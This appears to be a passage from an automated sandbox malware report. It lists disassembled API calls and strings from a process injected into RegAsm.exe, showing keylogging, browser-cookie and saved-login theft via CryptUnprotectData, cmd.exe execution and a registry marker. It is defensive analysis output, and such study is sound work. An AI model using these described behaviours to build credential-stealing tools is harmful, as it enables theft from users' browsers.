                                                          • _free.LIBCMT ref: 10004CE8
                                                          • _free.LIBCMT ref: 10004CF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 2506810119-1068371695
                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                          • API String ID: 368326130-3219657780
                                                          • Opcode ID: 44602993bd37dcb0b46df03d8f32aef03929348bb3827289624895e7cc1e30d3
                                                          • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                          • Opcode Fuzzy Hash: 44602993bd37dcb0b46df03d8f32aef03929348bb3827289624895e7cc1e30d3
                                                          • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 004162F5
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                            • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen$CloseCreateValue
                                                          • String ID: !D@$okmode$PG
                                                          • API String ID: 3411444782-3370592832
                                                          • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                          • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                          APIs
                                                            • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                          • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                          APIs
                                                            • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                          • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                          • API String ID: 1497725170-1359877963
                                                          • Opcode ID: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                          • Opcode Fuzzy Hash: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                          • Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CryptUnprotectData$crypt32
                                                          • API String ID: 2574300362-2380590389
                                                          • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                          • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                          • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2005118841-1866435925
                                                          • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                          • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                          • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                                          • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                          • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                          • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                          • ShowWindow.USER32(00000009), ref: 00416C61
                                                          • SetForegroundWindow.USER32 ref: 00416C6D
                                                            • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                            • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                            • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                            • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                          • String ID: !D@
                                                          • API String ID: 186401046-604454484
                                                          • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                          • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                          • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                          APIs
                                                          • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                          • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                          • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetCursorInfo$User32.dll
                                                          • API String ID: 1646373207-2714051624
                                                          • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                          • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetLastInputInfo$User32.dll
                                                          • API String ID: 2574300362-1519888992
                                                          • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                          • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                          • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                          • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                          • __freea.LIBCMT ref: 100087D5
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                          APIs
                                                          Strings
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                          • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
